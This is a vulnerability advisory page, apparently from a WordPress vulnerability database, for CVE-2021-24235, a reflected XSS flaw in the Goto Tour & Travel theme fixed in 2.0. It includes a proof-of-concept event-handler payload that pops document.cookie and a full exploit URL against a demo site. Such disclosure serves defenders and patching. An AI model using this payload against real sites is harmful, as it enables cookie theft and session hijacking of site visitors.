Goto – Tour & Travel < 2.0 – Unauthenticated Reflected XSS | CVE 2021-24235 | Theme Vulnerabilities

Description

The theme does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue.

Proof of Concept

Payload: <input/Autofocus/%0D*/Onfocus=alert(`m0ze`);alert(document.cookie);//>

https://boostifythemes.com/demo/wp/goto/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3B%2F%2F%3E&start_date=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3B%2F%2F%3E&avaibility=13

Affects Themes

Fixed in 2.0

References

CVE

URL

https://m0ze.ru/vulnerability/[2021-02-10]-[WordPress]-[CWE-79]-Goto-WordPress-Theme-v1.9.txt

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter website

https://m0ze.ru

Submitter twitter

Verified

Yes

WPVDB ID

eece90aa-582b-4c49-8b7c-14027f9df139

Timeline

Publicly Published

2021-03-31 (about 3 years ago)

Added

2021-03-31 (about 3 years ago)

Last Updated

2021-04-01 (about 3 years ago)

Other

Published

Title

Published

2014-06-12

Title

Video Comments Webcam Recorder < 1.92 - Unauthenticated Reflected XSS

Published

2021-12-02

Title

Customize Login Image < 3.5.3 - Admin+ Stored Cross-Site Scripting

Published

2018-01-12

Title

Coming Soon <= 1.1.18 - Authenticated Stored XSS & CSRF

Published

2022-08-25

Title

Advanced Order Export For WooCommerce < 3.3.2 - Reflected Cross-Site Scripting

Published

2023-03-20

Title

Stylish Cost Calculator Premium < 7.9.0 - Unauthenticated Stored XSS